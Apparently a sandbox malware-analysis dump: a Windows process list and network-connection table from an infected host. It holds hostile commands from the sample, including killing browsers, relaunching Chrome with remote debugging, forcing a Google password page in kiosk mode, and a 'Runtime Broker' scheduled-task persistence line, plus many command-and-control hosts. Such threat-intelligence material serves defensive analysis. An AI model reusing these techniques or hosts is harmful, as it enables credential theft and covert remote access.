"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1060 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:8
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2444 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1628 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2744 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3016 --field-trial-handle=1244,i,9768310386379901375,10037301823467209706,131072 /prefetch:2
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Users\Admin\AppData\Local\Temp\10337680101\809c765aad.exe
"C:\Users\Admin\AppData\Local\Temp\10337680101\809c765aad.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feee019758,0x7feee019768,0x7feee019778
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1668 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2768 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:1
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2776 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6768.0.1237007648\2000777132" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ea841a8-07b2-46f6-94e8-142a42e67c6a} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 1324 126d9858 gpu
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1200 --field-trial-handle=1332,i,3253693164457513813,6422328663393732510,131072 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\j309Yf3igW2C.bat" "
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6768.1.419246044\1726182755" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b90e8c79-163d-4f81-b5d9-d40700a00889} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 1512 1260d858 socket
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6768.2.1198528903\1642564753" -childID 1 -isForBrowser -prefsHandle 1060 -prefMapHandle 1172 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6eea3ff1-9982-4c26-8917-b5d91291cccd} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 2112 1266e758 tab
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6520.0.498855494\620754393" -parentBuildID 20221007134813 -prefsHandle 1196 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b8e455f-b82e-4032-90f5-45e828cbe96b} 6520 "\\.\pipe\gecko-crash-server-pipe.6520" 1284 13af9e58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6520.1.2022428829\1114733639" -parentBuildID 20221007134813 -prefsHandle 1460 -prefMapHandle 1456 -prefsLen 21708 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6231d0d7-117c-4448-9b07-1d7f945dc229} 6520 "\\.\pipe\gecko-crash-server-pipe.6520" 1472 c4f3858 socket
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6520.2.72368137\1359759400" -childID 1 -isForBrowser -prefsHandle 2272 -prefMapHandle 1836 -prefsLen 21746 -prefMapSize 233496 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {575117eb-e702-466b-b529-225217945785} 6520 "\\.\pipe\gecko-crash-server-pipe.6520" 1868 19c67258 tab
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\2f6LOb1AHb4E.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\AggregatorHost
C:\Users\Admin\AppData\Roaming\AggregatorHost
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Local\Discord.exe
C:\Users\Admin\AppData\Local\Discord.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | impactsupport.world | udp |
| US | 8.8.8.8:53 | nestlecompany.world | udp |
| US | 8.8.8.8:53 | mercharena.biz | udp |
| US | 8.8.8.8:53 | 5555.kl.com.ua | udp |
| NL | 5.79.66.145:80 | 5555.kl.com.ua | tcp |
| CA | 51.222.39.81:443 | tcp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | rottot.shop | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | dropout-37757.portmap.host | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | yk.l52m.com | udp |
| FR | 51.178.195.151:443 | tcp | |
| US | 8.8.8.8:53 | generalmills.pro | udp |
| US | 8.8.8.8:53 | stormlegue.com | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 173.255.204.62:443 | stormlegue.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | blast-hubs.com | udp |
| US | 173.255.204.62:443 | blast-hubs.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | blastikcn.com | udp |
| US | 173.255.204.62:443 | blastikcn.com | tcp |
| US | 8.8.8.8:53 | jmucha.fun | udp |
| NL | 5.79.66.145:80 | 5555.kl.com.ua | tcp |
| US | 8.8.8.8:53 | nickman12-46565.portmap.io | udp |
| US | 8.8.8.8:53 | nestlecompany.pro | udp |
| US | 8.8.8.8:53 | lestagames.world | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.96.50:443 | steamcommunity.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niggahunter-28633.portmap.io | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | www.l52m.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 104.245.241.219:80 | 104.245.241.219 | tcp |
| US | 8.8.8.8:53 | gitlab.com | udp |
| US | 172.65.251.78:443 | gitlab.com | tcp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 193.233.254.162:5555 | tcp | |
| KR | 175.112.170.177:80 | 175.112.170.177 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 195.211.191.93:80 | 195.211.191.93 | tcp |
| DE | 193.233.254.162:5555 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 193.233.254.162:5556 | tcp | |
| US | 8.8.8.8:53 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | udp |
| US | 172.66.0.235:443 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | tcp |
| FR | 51.77.7.204:443 | tcp | |
| US | 172.245.208.13:80 | 172.245.208.13 | tcp |
| US | 172.66.0.235:443 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | tcp |
| US | 107.174.192.179:80 | 107.174.192.179 | tcp |
| US | 172.66.0.235:443 | pub-c7b31ab9decd4a2684fcd9fc90862261.r2.dev | tcp |
| US | 8.8.8.8:53 | plothelperfu.top | udp |
| US | 8.8.8.8:53 | strivehelpeu.bond | udp |
| US | 8.8.8.8:53 | rootedkrypto-29674.portmap.host | udp |
| US | 8.8.8.8:53 | crookedfoshe.bond | udp |
| US | 8.8.8.8:53 | immolatechallen.bond | udp |
| US | 8.8.8.8:53 | stripedre-lot.bond | udp |
| US | 8.8.8.8:53 | growthselec.bond | udp |
| US | 8.8.8.8:53 | jarry-deatile.bond | udp |
| US | 8.8.8.8:53 | pain-temper.bond | udp |
| US | 8.8.8.8:53 | jarry-fixxer.bond | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.96.50:443 | steamcommunity.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | smtp.gmail.com | udp |
| BE | 142.251.173.109:587 | smtp.gmail.com | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 8.8.4.4:53 | bighecks.net | udp |
| US | 184.105.192.2:80 | bighecks.net | tcp |
| US | 8.8.4.4:53 | sonic4us.ru | udp |
| US | 172.245.208.13:80 | 172.245.208.13 | tcp |
| US | 8.8.8.8:53 | sonic4us.ru | udp |
| FR | 185.136.161.124:6128 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.4.4:53 | imageshells.com | udp |
| US | 184.105.192.2:80 | imageshells.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.4.4:53 | www.yahgodz.com | udp |
| US | 8.8.8.8:53 | www.yahgodz.com | udp |
| US | 184.105.192.2:80 | www.yahgodz.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 107.174.192.179:80 | 107.174.192.179 | tcp |
| FR | 51.77.7.204:443 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 89.208.104.175:5000 | tcp | |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| BE | 142.251.173.109:587 | smtp.gmail.com | tcp |
| US | 8.8.8.8:53 | atirflee.world | udp |
| US | 104.21.38.122:443 | atirflee.world | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | clear-spice.gl.at.ply.gg | udp |
| US | 147.185.221.25:62042 | clear-spice.gl.at.ply.gg | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.38.122:443 | atirflee.world | tcp |
| US | 104.21.38.122:443 | atirflee.world | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | www.zoommeetspace.com | udp |
| US | 66.33.60.35:443 | www.zoommeetspace.com | tcp |
| US | 8.8.8.8:53 | www.wesco-distributors.com | udp |
| US | 66.33.60.193:443 | www.wesco-distributors.com | tcp |
| US | 66.33.60.35:443 | www.zoommeetspace.com | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 66.33.60.193:443 | www.wesco-distributors.com | tcp |
| US | 8.8.8.8:53 | www.periqi.com | udp |
| US | 76.76.21.61:443 | www.periqi.com | tcp |
| RU | 45.93.20.224:80 | 45.93.20.224 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 176.65.138.157:80 | 176.65.138.157 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 176.65.138.157:80 | 176.65.138.157 | tcp |
| US | 8.8.8.8:53 | buinhatduy.duckdns.org | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| CN | 39.104.25.13:8111 | tcp | |
| US | 8.8.8.8:53 | buinhatduy01.ddns.net | udp |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| DE | 176.65.138.157:1443 | tcp | |
| US | 149.28.102.10:7000 | buinhatduy.duckdns.org | tcp |
| NL | 185.156.73.98:80 | 185.156.73.98 | tcp |
| US | 8.8.8.8:53 | senoc43726-29929.portmap.host | udp |
| DE | 193.161.193.99:29929 | senoc43726-29929.portmap.host | tcp |
| US | 8.8.8.8:53 | joxi.net | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 78.47.21.153:80 | joxi.net | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 149.255.35.125:443 | tcp | |
| US | 8.8.8.8:53 | 5.tcp.ngrok.io | udp |
| US | 3.141.204.47:20448 | 5.tcp.ngrok.io | tcp |
| DE | 193.233.254.31:5555 | tcp | |
| DE | 193.161.193.99:29929 | senoc43726-29929.portmap.host | tcp |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| NL | 185.156.73.98:80 | 185.156.73.98 | tcp |
| US | 147.185.221.25:62042 | clear-spice.gl.at.ply.gg | tcp |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| FR | 185.136.161.124:8761 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 20.112.250.133:80 | microsoft.com | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 8.8.8.8:53 | microsoft-com.mail.protection.outlook.com | udp |
| US | 52.101.8.49:25 | microsoft-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | vanaheim.cn | udp |
| RU | 46.173.214.156:443 | vanaheim.cn | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 149.28.102.10:7000 | buinhatduy.duckdns.org | tcp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| US | 8.8.8.8:53 | 147.63.102.212.dnsbl.sorbs.net | udp |
| RU | 185.7.214.57:480 | tcp | |
| US | 8.8.8.8:53 | 147.63.102.212.bl.spamcop.net | udp |
| US | 8.8.8.8:53 | 147.63.102.212.zen.spamhaus.org | udp |
| US | 8.8.8.8:53 | 147.63.102.212.sbl-xbl.spamhaus.org | udp |
| US | 8.8.8.8:53 | 147.63.102.212.cbl.abuseat.org | udp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| CN | 8.155.44.213:7001 | tcp | |
| NL | 185.156.73.98:80 | 185.156.73.98 | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 149.28.102.10:7000 | buinhatduy.duckdns.org | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| DE | 193.161.193.99:29929 | senoc43726-29929.portmap.host | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FR | 51.77.7.204:443 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| NL | 185.156.73.98:80 | 185.156.73.98 | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 3.141.204.47:20448 | 5.tcp.ngrok.io | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.11.61.16:424 | tcp | |
| UA | 185.156.72.58:424 | tcp | |
| RU | 185.11.61.15:424 | tcp | |
| UA | 185.156.72.27:424 | tcp | |
| RU | 185.42.12.21:424 | tcp | |
| RU | 185.42.12.45:424 | tcp | |
| RU | 185.7.214.51:424 | tcp | |
| US | 149.28.102.10:7000 | buinhatduy.duckdns.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| GB | 172.217.169.36:80 | www.google.com | tcp |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| DE | 193.233.254.31:5555 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| GB | 163.70.147.174:443 | www.instagram.com | tcp |
| GB | 163.70.147.174:443 | www.instagram.com | tcp |
| GB | 163.70.147.174:443 | www.instagram.com | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 8.8.8.8:53 | hergostaging.wpengine.com | udp |
| US | 35.202.211.50:443 | hergostaging.wpengine.com | tcp |
| US | 147.185.221.25:62042 | clear-spice.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | wxayfarer.live | udp |
| US | 104.21.80.1:443 | wxayfarer.live | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 104.21.80.1:443 | wxayfarer.live | tcp |
| US | 104.21.80.1:443 | wxayfarer.live | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 3.141.204.47:20448 | 5.tcp.ngrok.io | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 8.8.8.8:53 | yahoo.com | udp |
| US | 8.8.8.8:53 | mta7.am0.yahoodns.net | udp |
| US | 67.195.204.72:25 | mta7.am0.yahoodns.net | tcp |
| RU | 185.7.214.57:480 | tcp | |
| DE | 193.161.193.99:29929 | senoc43726-29929.portmap.host | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 149.28.102.10:7000 | buinhatduy.duckdns.org | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| DE | 193.161.193.99:29929 | senoc43726-29929.portmap.host | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 8.8.4.4:53 | bighecks.net | udp |
| US | 3.141.204.47:20448 | 5.tcp.ngrok.io | tcp |
| US | 184.105.192.2:80 | bighecks.net | tcp |
| US | 8.8.8.8:53 | lp.vocemerecemais.net | udp |
| US | 69.49.241.129:443 | lp.vocemerecemais.net | tcp |
| US | 8.8.4.4:53 | sonic4us.ru | udp |
| RU | 185.7.214.57:480 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| NL | 185.156.73.98:80 | 185.156.73.98 | tcp |
| CN | 42.186.17.183:8080 | tcp | |
| RU | 185.7.214.57:480 | tcp | |
| US | 8.8.4.4:53 | imageshells.com | udp |
| RU | 185.7.214.57:480 | tcp | |
| US | 184.105.192.2:80 | imageshells.com | tcp |
| US | 8.8.4.4:53 | www.yahgodz.com | udp |
| US | 184.105.192.2:80 | www.yahgodz.com | tcp |
| DE | 193.161.193.99:29929 | senoc43726-29929.portmap.host | tcp |
| RU | 185.7.214.57:480 | tcp | |
| US | 142.147.96.74:7000 | buinhatduy01.ddns.net | tcp |
| US | 149.28.102.10:7000 | buinhatduy.duckdns.org | tcp |
